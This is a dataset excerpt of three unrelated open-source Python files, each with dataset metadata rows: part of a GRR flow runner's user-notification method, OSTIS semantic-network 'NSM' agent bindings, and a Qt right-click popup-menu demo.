self.Log(format_str, *args)
def Notify(self, message_type, subject, msg):
"""Send a notification to the originating user.
Args:
message_type: The type of the message. This allows the UI to format
a link to the original object e.g. "ViewObject" or "HostInformation"
subject: The urn of the AFF4 object of interest in this link.
msg: A free form textual message.
"""
user = self.context.creator
# Don't send notifications to system users.
if (self.runner_args.notify_to_user and
user not in aff4_users.GRRUser.SYSTEM_USERS):
# Prefix the message with the hostname of the client we are running
# against.
if self.runner_args.client_id:
client_fd = aff4.FACTORY.Open(
self.runner_args.client_id, mode="rw", token=self.token)
hostname = client_fd.Get(client_fd.Schema.HOSTNAME) or ""
client_msg = "%s: %s" % (hostname, msg)
else:
client_msg = msg
# Add notification to the User object.
fd = aff4.FACTORY.Create(
aff4.ROOT_URN.Add("users").Add(user),
aff4_users.GRRUser,
mode="rw",
token=self.token)
# Queue notifications to the user.
fd.Notify(message_type, subject, client_msg, self.session_id)
fd.Close()
# Add notifications to the flow.
notification = rdf_flows.Notification(
type=message_type,
subject=utils.SmartUnicode(subject),
message=utils.SmartUnicode(msg),
source=self.session_id,
timestamp=rdfvalue.RDFDatetime.Now())
data_store.DB.Set(self.session_id,
self.flow_obj.Schema.NOTIFICATION,
notification,
replace=False,
sync=False,
token=self.token)
# Disable further notifications.
self.context.user_notified = True
# Allow the flow to either specify an event name or an event handler URN.
notification_event = (self.runner_args.notification_event or
self.runner_args.notification_urn)
if notification_event:
if self.context.state == rdf_flows.FlowContext.State.ERROR:
status = rdf_flows.FlowNotification.Status.ERROR
else:
status = rdf_flows.FlowNotification.Status.OK
event = rdf_flows.FlowNotification(
session_id=self.context.session_id,
flow_name=self.runner_args.flow_name,
client_id=self.runner_args.client_id,
status=status)
self.flow_obj.Publish(notification_event, message=event)
| apache-2.0 | -6,703,846,200,527,131,000 | 37.063301 | 80 | 0.667221 | false |
laz2/sc-core | bindings/python/sc_core/nsm.py | 1 | 16628 |
"""
-----------------------------------------------------------------------------
This source file is part of OSTIS (Open Semantic Technology for Intelligent Systems)
For the latest info, see http://www.ostis.net
Copyright (c) 2010 OSTIS
OSTIS is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OSTIS is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with OSTIS. If not, see <http://www.gnu.org/licenses/>.
-----------------------------------------------------------------------------
"""
'''
Created on
26.01.11
@author: Zhitko V.A.
'''
import pm
import msession
import time
session = msession.MThreadSession(pm.get_session())
segment = session.open_segment(u"/etc/nsm")
class nsm:
info = "NSM Keynodes"
goals = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/goals")
attr_confirmed = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/confirmed_")
attr_active = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/active_")
attr_confirm_ = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/confirm_")
attr_search = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/search_")
attr_searched = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/searched_")
attr_generate = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/generate_")
attr_generated = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/generated_")
result = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/Result")
nsm_command = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command")
attr_nsm_command = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_")
attr_nsm_command_pattern = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_pattern_")
attr_nsm_command_elem = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_elem_")
attr_nsm_command_comment = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_comment_")
attr_nsm_command_shortname = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_shortname_")
n_1 = session.find_keynode_full_uri(u"/proc/keynode/1_")
n_2 = session.find_keynode_full_uri(u"/proc/keynode/2_")
attr = {
0:session.find_keynode_full_uri(u"/proc/keynode/1_"),
1:session.find_keynode_full_uri(u"/proc/keynode/2_"),
2:session.find_keynode_full_uri(u"/proc/keynode/3_"),
3:session.find_keynode_full_uri(u"/proc/keynode/4_"),
4:session.find_keynode_full_uri(u"/proc/keynode/5_"),
5:session.find_keynode_full_uri(u"/proc/keynode/6_"),
6:session.find_keynode_full_uri(u"/proc/keynode/7_"),
7:session.find_keynode_full_uri(u"/proc/keynode/8_"),
8:session.find_keynode_full_uri(u"/proc/keynode/9_"),
9:session.find_keynode_full_uri(u"/proc/keynode/10_")
}
def initNSM(ses):
global session
session = ses
global segment
segment = session.open_segment(u"/etc/nsm")
global nsm
nsm.goals = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/goals")
nsm.attr_confirmed = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/confirmed_")
nsm.attr_active = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/active_")
nsm.attr_confirm_ = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/confirm_")
nsm.attr_search = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/search_")
nsm.attr_searched = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/searched_")
nsm.attr_generate = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/generate_")
nsm.attr_generated = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/generated_")
nsm.result = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/Result")
nsm.nsm_command = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command")
nsm.attr_nsm_command = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_")
nsm.attr_nsm_command_pattern = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_pattern_")
nsm.attr_nsm_command_elem = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_elem_")
nsm.attr_nsm_command_comment = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_comment_")
nsm.attr_nsm_command_shortname = session.find_keynode_full_uri(u"/proc/agents/nsm/keynode/nsm_command_shortname_")
nsm.n_1 = session.find_keynode_full_uri(u"/proc/keynode/1_")
nsm.n_2 = session.find_keynode_full_uri(u"/proc/keynode/2_")
nsm.attr = {
0:session.find_keynode_full_uri(u"/proc/keynode/1_"),
1:session.find_keynode_full_uri(u"/proc/keynode/2_"),
2:session.find_keynode_full_uri(u"/proc/keynode/3_"),
3:session.find_keynode_full_uri(u"/proc/keynode/4_"),
4:session.find_keynode_full_uri(u"/proc/keynode/5_"),
5:session.find_keynode_full_uri(u"/proc/keynode/6_"),
6:session.find_keynode_full_uri(u"/proc/keynode/7_"),
7:session.find_keynode_full_uri(u"/proc/keynode/8_"),
8:session.find_keynode_full_uri(u"/proc/keynode/9_"),
9:session.find_keynode_full_uri(u"/proc/keynode/10_")
}
def madeNewNSMCommand(sc_pattern_set,
command_elem_list = [],
str_command_short_name = "",
str_command_comment = ""):
print "[NSM] Register new NSM command"
# создание узла нсм комманды
sc_nsm_command = session.create_el(segment, pm.SC_N_CONST)
session.gen3_f_a_f(segment,nsm.nsm_command,sc_nsm_command, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
# создание узла связки нсм комманды
sc_nsm_command_sheaf = session.create_el(segment, pm.SC_N_CONST)
# соединяем узлы, под атрибутом attr_nsm_command_
arc = session.gen3_f_a_f(segment, sc_nsm_command, sc_nsm_command_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr_nsm_command, arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
# создаем узел шаблона поиска нсм комманды
sc_nsm_pattern = session.create_el(segment, pm.SC_N_CONST)
# добавляем узел в нсм комманду под атрибутом
arc = session.gen3_f_a_f(segment, sc_nsm_command_sheaf, sc_nsm_pattern, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr_nsm_command_pattern, arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
# копируем шаблон поиска в нсм комманду
q = session.copySetToSet(segment,sc_pattern_set,sc_nsm_pattern)
# создаем узел параметров нсм комманды
sc_nsm_command_elem = session.create_el(segment, pm.SC_N_CONST)
# добавляем узел в нсм комманду под атрибутом
arc = session.gen3_f_a_f(segment, sc_nsm_command_sheaf,
sc_nsm_command_elem, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr_nsm_command_elem, arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
# копируем атрибуты комманды
for i, el in enumerate(command_elem_list):
if i < 10:
arc = session.gen3_f_a_f(segment, sc_nsm_command_elem, el, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr[i], arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
# создаем узел краткого названия нсм комманды и добавляем его
sc_nsm_command_short_name = session.create_el(segment, pm.SC_N_CONST)
session.set_content_str(sc_nsm_command_short_name, str_command_short_name)
arc = session.gen3_f_a_f(segment, sc_nsm_command_sheaf,
sc_nsm_command_short_name, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr_nsm_command_shortname, arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
# создаем узел комментария нсм комманды и добавляем его
sc_nsm_command_comment = session.create_el(segment, pm.SC_N_CONST)
session.set_content_str(sc_nsm_command_comment, str_command_comment)
arc = session.gen3_f_a_f(segment, sc_nsm_command_sheaf,
sc_nsm_command_comment, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
session.gen3_f_a_f(segment, nsm.attr_nsm_command_comment, arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
return sc_nsm_command
def runNSMCommandWithParams(sc_nsm_command,
command_elem_list = [],
search = True):
#print "[NSM] run NSM command with params"
sc_nsm_request = session.create_el(segment, pm.SC_N_CONST)
session.gen3_f_a_f(segment, nsm.goals, sc_nsm_request, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
sc_nsm_request_sheaf = session.create_el(segment, pm.SC_N_CONST)
arc_sheaf = session.gen3_f_a_f(segment, sc_nsm_request, sc_nsm_request_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
for i, el in enumerate(command_elem_list):
arc = session.gen3_f_a_f(segment, sc_nsm_request_sheaf, el, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[2]
session.gen3_f_a_f(segment, nsm.attr[i], arc, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
session.gen3_f_a_f(segment, sc_nsm_command, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
session.gen3_f_a_f(segment, nsm.attr_active, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
if search:
session.gen3_f_a_f(segment, nsm.attr_search, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
else:
session.gen3_f_a_f(segment, nsm.attr_generate, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
return sc_nsm_request
def runNSMwithPattern(sc_pattern,
search = True, patternName = None):
#print "[NSM] run NSM with pattern"
sc_nsm_request = session.create_el(segment, pm.SC_N_CONST)
if patternName is not None:
session.set_content_str(sc_nsm_request, patternName)
session.gen3_f_a_f(segment, nsm.goals, sc_nsm_request, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
sc_nsm_request_sheaf = session.create_el(segment, pm.SC_N_CONST)
arc_sheaf = session.gen3_f_a_f(segment, sc_nsm_request, sc_nsm_request_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)[1]
pat_els = session.search3_f_a_a(sc_pattern, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL, pm.SC_EMPTY)
for el in pat_els:
session.gen3_f_a_f(segment, sc_nsm_request_sheaf, el[2], pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
session.gen3_f_a_f(segment, nsm.attr_active, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
session.gen3_f_a_f(segment, nsm.attr_confirm_, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
if search:
session.gen3_f_a_f(segment, nsm.attr_search, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
else:
session.gen3_f_a_f(segment, nsm.attr_generate, arc_sheaf, pm.SC_A_CONST|pm.SC_POS|pm.SC_ACTUAL)
return sc_nsm_request
def getNSMRequestScResult(sc_nsm_request, wait_for_result = True, wait_time = 0.1):
print "[NSM] search for NSM request result"
# wait for searched_
res = session.search5_f_a_a_a_f(sc_nsm_request,
pm.SC_A_CONST|pm.SC_POS,
pm.SC_N_CONST,
pm.SC_A_CONST|pm.SC_POS,
nsm.attr_searched)
while not res:
if wait_for_result:
print "[NSM] wait for result"
time.sleep(wait_time)
else:
return None
res = session.search5_f_a_a_a_f(sc_nsm_request,
pm.SC_A_CONST|pm.SC_POS,
pm.SC_N_CONST,
pm.SC_A_CONST|pm.SC_POS,
nsm.attr_searched)
# search for confirmed_
sc_nsm_arc_sheaf = res[0][1]
res = session.search3_f_a_f(nsm.attr_confirmed,
pm.SC_A_CONST|pm.SC_POS,
sc_nsm_arc_sheaf)
if not res:
print "[nsm] no any results found"
return None
res = session.search3_a_a_f(pm.SC_N_CONST,
pm.SC_A_CONST|pm.SC_POS,
sc_nsm_arc_sheaf)
for set in res:
if session.search3_f_a_f(nsm.result,pm.SC_A_CONST|pm.SC_POS,set[0]):
print "[NSM] find result"
return set[0]
print "[nsm] no any results found"
return None
def convertNsmResult2SimpleSet(sc_nsm_result):
res = []
result_variants = session.search3_f_a_a(sc_nsm_result, pm.SC_A_CONST|pm.SC_POS, pm.SC_N_CONST)
if result_variants is None: return None
for res_variant in result_variants:
cur_element_sheafs = session.search3_f_a_a(res_variant[2], pm.SC_A_CONST|pm.SC_POS, pm.SC_N_CONST)
if not cur_element_sheafs: continue
#print cur_element_sheafs
for cur_element_sheaf in cur_element_sheafs:
#print cur_element_sheaf
cur_find_element = session.search5_f_a_a_a_f(cur_element_sheaf[2],
pm.SC_A_CONST|pm.SC_POS,
pm.SC_EMPTY,
pm.SC_A_CONST|pm.SC_POS,
nsm.n_2)
if not cur_find_element: continue
res.append(cur_find_element[0][2])
const_elements = getConstPatternElsByScResult(sc_nsm_result)
if const_elements:
res = res + const_elements
return res
def convertNsmResult2Sets(sc_nsm_result):
res = []
result_variants = session.search3_f_a_a(sc_nsm_result, pm.SC_A_CONST|pm.SC_POS, pm.SC_N_CONST)
if result_variants is None: return None
for res_variant in result_variants:
v_res = []
cur_element_sheafs = session.search3_f_a_a(res_variant[2], pm.SC_A_CONST|pm.SC_POS, pm.SC_N_CONST)
if not cur_element_sheafs: continue
for cur_element_sheaf in cur_element_sheafs:
s_res = []
cur_find_element = session.search5_f_a_a_a_f(cur_element_sheaf[2],
pm.SC_A_CONST|pm.SC_POS,
pm.SC_EMPTY,
pm.SC_A_CONST|pm.SC_POS,
nsm.n_1)
if not cur_find_element: continue
s_res.append(cur_find_element[0][2])
cur_find_element = session.search5_f_a_a_a_f(cur_element_sheaf[2],
pm.SC_A_CONST|pm.SC_POS,
pm.SC_EMPTY,
pm.SC_A_CONST|pm.SC_POS,
nsm.n_2)
if not cur_find_element: continue
s_res.append(cur_find_element[0][2])
v_res.append(s_res)
res.append(v_res)
return res
def getConstPatternElsByScResult(sc_nsm_result):
temp = session.search3_f_a_a(sc_nsm_result, pm.SC_A_CONST|pm.SC_POS, pm.SC_A_CONST|pm.SC_POS)
if not temp: return None
print temp
sheafArc = temp[0][2]
print sheafArc
sc_pattern = session.search3_a_f_a(pm.SC_N_CONST, sheafArc, pm.SC_N_CONST)[0][2]
consts = session.search3_f_a_a(sc_pattern, pm.SC_A_CONST|pm.SC_POS, pm.SC_CONST)
res = []
for els in consts:
res.append(els[2])
if len(res) is 0: return None
return res
| lgpl-3.0 | 4,471,898,048,388,171,000 | 51.608414 | 122 | 0.607998 | false |
alexlib/Qt-Python-Binding-Examples | common_widgets/menu/popup_menu_by_right_click.py | 1 | 1959 | #!/usr/bin/env python
#-*- coding:utf-8 -*-
"""
popup menu by right click
Tested environment:
Mac OS X 10.6.8
http://developer.qt.nokia.com/doc/qt-4.8/qmenu.html#details
http://diotavelli.net/PyQtWiki/Handling%20context%20menus
"""
import sys
try:
from PySide import QtCore, QtGui
except ImportError:
from PyQt4 import QtCore, QtGui
class Demo(QtGui.QMainWindow):
def __init__(self):
super(Demo, self).__init__()
x, y, w, h = 500, 200, 300, 400
self.setGeometry(x, y, w, h)
self.popup_menu = QtGui.QMenu(self)
# menu item
self.item_add_act = QtGui.QAction("Add", self)
self.item_add_act.triggered.connect(self.add_cb)
self.popup_menu.addAction(self.item_add_act)
self.item_delete_act = QtGui.QAction("Delete", self)
self.item_delete_act.triggered.connect(self.delete_cb)
self.popup_menu.addAction(self.item_delete_act)
self.popup_menu.addSeparator()
self.item_rename_act = QtGui.QAction("Rename", self)
self.item_rename_act.triggered.connect(self.rename_cb)
self.popup_menu.addAction(self.item_rename_act)
def add_cb(self):
print "add callback"
def delete_cb(self):
print "delete callback"
def rename_cb(self):
print "rename callback"
def contextMenuEvent(self, event):
point = self.mapToGlobal(event.pos())
act = self.popup_menu.exec_(point)
if act == self.item_add_act:
print "item add clicked"
elif act == self.item_delete_act:
print "item delete clicked"
elif act == self.item_rename_act:
print "item rename clicked"
return super(Demo, self).contextMenuEvent(event)
def show_and_raise(self):
self.show()
self.raise_()
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
demo = Demo()
demo.show_and_raise()
sys.exit(app.exec_()) | bsd-3-clause | 1,564,691,287,392,536,600 | 24.454545 | 62 | 0.617662 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.